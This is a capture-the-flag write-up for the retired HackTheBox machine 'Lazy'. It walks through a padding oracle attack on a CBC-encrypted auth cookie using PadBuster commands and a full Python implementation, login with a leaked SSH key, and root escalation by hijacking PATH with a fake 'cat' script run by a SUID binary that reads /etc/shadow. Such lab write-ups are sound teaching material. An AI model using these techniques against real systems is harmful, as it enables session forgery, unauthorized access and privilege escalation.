Lazy - HackTheBox

This writeup is for one of the Retired boxes on HackTheBox called Lazy [1].

Step 1 - Recon & Enumeration

I started with Nmap, UDP Proto Scanner, Nikto and Dirbuster. Starting with Nmap on host 10.10.10.18 we have

The other 3 tools did not show anything important.

Step 2 - Exploitation

This box gave me a really hard time until I realized what I had to do in order to exploit it. The attacks I tried were:

 1. Use Dirbuster to look for interesting files and folders
 2. SQL injection in register.php and login.php
 3. Using Hydra and rockyou to brute force login.php
 4. Review all Requests and Responses using Burp Suite

Using Burp Suite's Repeater we can see that a logged-in user is assigned two cookies, PHPSESSID and auth.

PHPSESSID is PHP's standard random session identifier, so I focused on auth, mostly because it had a different format. Base64-decoding the auth value does not give readable text but 24 bytes of binary data, three blocks of 8 bytes, and tampering with the cookie makes the application answer with an Invalid Padding error:

An Invalid Padding error leaked to the client is the classic sign of a padding oracle: the server tells us whether the decrypted cookie ended in valid padding, and that single yes/no, collected over many modified ciphertexts, is enough both to decrypt the cookie and to encrypt a plaintext of our choice without ever knowing the key. The fastest way to confirm it is PadBuster, a Perl script for automating padding oracle attacks [2]. PadBuster can decrypt arbitrary ciphertext, encrypt arbitrary plaintext, and perform automated response analysis to determine whether a request is vulnerable to padding oracle attacks.
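To make clear what PadBuster is doing, here is the attack written out in Python as an added example; it is not code from the writeup or from the box. The server half (the key, an 8-byte stand-in block cipher, CBC with a prepended IV, PKCS#7 padding and the "Invalid padding" error) is constructed, because Lazy's real cipher and key are unknown; the attacker half uses nothing but the yes/no oracle, which is exactly the position the two padbuster commands are in: first decrypt the cookie, then encrypt a chosen plaintext. The cookie format user=<name> and the username mitsos are taken from the writeup; the block size of 8 is the one passed to PadBuster.

```python
"""Padding oracle attack on a CBC-encrypted auth cookie (added example, not from the writeup).
The server half (key, stand-in cipher, PKCS#7 padding, 'Invalid padding' check) is constructed
in place of Lazy's unknown back end; the attacker half only ever calls oracle()."""
import base64
import hashlib
import hmac
import os

BLOCK = 8              # 8-byte blocks, the block size handed to PadBuster
_KEY = os.urandom(16)  # server secret; never read by the attacker functions

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

# Stand-in 64-bit block cipher: an 8-round Feistel network with an HMAC round function.
# Any block cipher would do; the attack never looks inside it.
def _f(half: bytes, rnd: int) -> bytes:
    return hmac.new(_KEY, bytes([rnd]) + half, hashlib.sha256).digest()[:4]

def _enc_block(b: bytes) -> bytes:
    l, r = b[:4], b[4:]
    for i in range(8):
        l, r = r, _xor(l, _f(r, i))
    return l + r

def _dec_block(b: bytes) -> bytes:
    l, r = b[:4], b[4:]
    for i in reversed(range(8)):
        l, r = _xor(r, _f(l, i)), l
    return l + r

def _pad(m: bytes) -> bytes:
    n = BLOCK - len(m) % BLOCK
    return m + bytes([n]) * n

def _unpad(m: bytes) -> bytes:
    n = m[-1]
    if not 1 <= n <= BLOCK or m[-n:] != bytes([n]) * n:
        raise ValueError("Invalid padding")   # the message the web app leaks
    return m[:-n]

def server_issue_cookie(user: bytes) -> str:
    """CBC-encrypt 'user=<name>' with a random IV prepended, base64 like the auth cookie."""
    iv = os.urandom(BLOCK)
    out, prev, padded = [iv], iv, _pad(b"user=" + user)
    for i in range(0, len(padded), BLOCK):
        prev = _enc_block(_xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return base64.b64encode(b"".join(out)).decode()

def server_read_cookie(cookie: str) -> bytes:
    ct = base64.b64decode(cookie)
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return _unpad(b"".join(_xor(_dec_block(blocks[i]), blocks[i - 1]) for i in range(1, len(blocks))))

def oracle(ct: bytes) -> bool:
    """All the attacker gets back from the server: did the padding check pass?"""
    try:
        server_read_cookie(base64.b64encode(ct).decode())
        return True
    except ValueError:
        return False

# Attacker side: from here on only oracle() is used, never _KEY or the cipher.
def recover_intermediate(target: bytes) -> bytes:
    """Recover D(target), last byte first, by forging the block that precedes it."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        forged = bytearray(BLOCK)
        forged[pos + 1:] = bytes(inter[j] ^ padval for j in range(pos + 1, BLOCK))  # known bytes
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:  # rule out a lucky 0x02 0x02 (etc.) match by disturbing byte 6
                probe = bytearray(forged)
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe) + target):
                    continue
            inter[pos] = guess ^ padval
            break
        else:
            raise RuntimeError("oracle never accepted a padding byte")
    return bytes(inter)

def decrypt_cookie(cookie: str) -> bytes:
    """What 'padbuster <url> <cookie> 8' does: plaintext block i = D(C[i]) XOR C[i-1]."""
    ct = base64.b64decode(cookie)
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return _unpad(b"".join(_xor(recover_intermediate(blocks[i]), blocks[i - 1])
                           for i in range(1, len(blocks))))

def forge_cookie(plaintext: bytes) -> str:
    """What '-plaintext user=admin' does: fix a final block, solve each earlier block backwards."""
    padded, ct = _pad(plaintext), [bytes(BLOCK)]  # any final block works
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        ct.insert(0, _xor(recover_intermediate(ct[0]), padded[i:i + BLOCK]))
    return base64.b64encode(b"".join(ct)).decode()
```

Two details matter in practice. The forged cookie's first block is only an IV, so encryption works by choosing the last ciphertext block freely and solving backwards, which is why PadBuster can encrypt without the key. And the last-byte step needs the extra probe: a guess that happens to decrypt to 0x02 0x02 (or any longer valid run) is accepted by the oracle too, so the byte before it is disturbed to make sure only the 0x01 case survives.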

 padbuster http://10.10.10.18/ nh02G3bWp1Fr7zSug99gBgowY9FByHe7 8 --cookies auth=nh02G3bWp1Fr7zSug99gBgowY9FByHe7 --encoding 0
 padbuster http://10.10.10.18/ nh02G3bWp1Fr7zSug99gBgowY9FByHe7 8 --cookies auth=nh02G3bWp1Fr7zSug99gBgowY9FByHe7 --encoding 0 -plaintext user=admin

The first command decrypts the cookie and reveals its plaintext, which is what tells us the format is user=<username>; the second encrypts user=admin and prints a forged cookie. Replacing our auth cookie with that value logs us in as admin. The admin page leads to a URL that provides a username (mitsos) and an SSH private key. Save the key to a file, restrict its permissions (ssh refuses a key readable by others) and log in:

 chmod 600 id_rsa
 ssh -i id_rsa mitsos@10.10.10.18

Now we can read the user.txt file.


Step 3 - From User to Admin

Once on the box I immediately noticed a binary named backup with the SUID bit set. Running it prints the contents of /etc/shadow, a file mitsos cannot read, so the binary really is executing with privileges we do not have.

The first thing I did was to take the root hash from that output and hand it to John the Ripper with the rockyou wordlist. Unfortunately, this was not the way to solve this challenge.

Using strings, strace and ltrace, I was able to identify that the SUID binary shells out to this exact command:

 cat /etc/shadow

Noticed anything weird?

Noticed that cat is called without its full path, /bin/cat? The shell the binary spawns looks the command up in the directories listed in $PATH, and $PATH is an environment variable the unprivileged caller controls even though the binary itself runs with root's privileges. So we can create an executable named cat in /home/mitsos/, put /home/mitsos at the front of $PATH, and the binary will run our cat as root instead of /bin/cat. All we need now is to put our payload in that cat file; the payload itself must call /bin/cat by its full path, otherwise it would just invoke itself.

 mkdir -p /tmp/fld
 printf '#!/bin/sh\n/bin/cat /root/root.txt > /tmp/fld/ft.txt\n' > /home/mitsos/cat
 chmod +x /home/mitsos/cat
 export PATH=/home/mitsos:$PATH
 which cat

which cat should now answer /home/mitsos/cat. All that is left is to run the backup binary: it executes our cat as root, and /tmp/fld/ft.txt is created with the root.txt hash inside.
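The same PATH resolution reproduced in Python as an added example (not the writeup's own code, and nothing here is setuid): a constructed stand-in for the backup binary that runs `cat <file>` through a shell the way system() does, beside a hardened form that uses an absolute path, no shell and a fixed PATH. The fake cat, the shadow stand-in and the temporary directory names are all constructed for the demo; the point is which cat ends up running, not the privilege level.

```python
"""PATH hijacking of a privileged program that shells out to a bare 'cat' (added example).
Stands in for Lazy's backup binary: system("cat <file>") runs /bin/sh -c, and the shell
resolves 'cat' through the PATH it inherited from the unprivileged caller."""
import os
import subprocess
import tempfile


def run_like_backup(target: str, path_env: str) -> str:
    """Vulnerable form: the equivalent of system("cat " + target) under the caller's PATH."""
    r = subprocess.run(f"cat {target}", shell=True, capture_output=True, text=True,
                       env={"PATH": path_env})
    return r.stdout.strip()


def run_hardened(target: str) -> str:
    """Hardened form: absolute path, an argument list instead of a shell, and a PATH the
    program sets itself instead of whatever the caller exported."""
    r = subprocess.run(["/bin/cat", target], capture_output=True, text=True,
                       env={"PATH": "/usr/bin:/bin"})
    return r.stdout.strip()


def demo() -> dict:
    """Constructed scenario: a fake 'cat' in a writable directory prepended to PATH."""
    work = tempfile.mkdtemp()
    secret = os.path.join(work, "shadow")            # stand-in for /etc/shadow
    with open(secret, "w") as f:
        f.write("root:$6$constructed-hash:18000:0:99999:7:::\n")
    fake_cat = os.path.join(work, "cat")             # the attacker's payload, like ~/cat on Lazy
    with open(fake_cat, "w") as f:
        f.write("#!/bin/sh\necho HIJACKED\n")
    os.chmod(fake_cat, 0o755)
    clean = "/usr/bin:/bin"
    hijacked = f"{work}:{clean}"                     # export PATH=/home/mitsos:$PATH
    return {
        "vulnerable_clean_path": run_like_backup(secret, clean),
        "vulnerable_hijacked_path": run_like_backup(secret, hijacked),
        "hardened_hijacked_path": run_hardened(secret),
    }
```

With the clean PATH the vulnerable form prints the shadow stand-in; with the attacker's directory prepended it prints HIJACKED, because the shell found the fake cat first. The hardened form is unaffected by the caller's environment, which is the fix a setuid program needs: never rely on inherited PATH, and prefer exec of an absolute path over a shell command string.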

References

[1] HackTheBox
[2] Automated Padding Oracle Attacks With PadBuster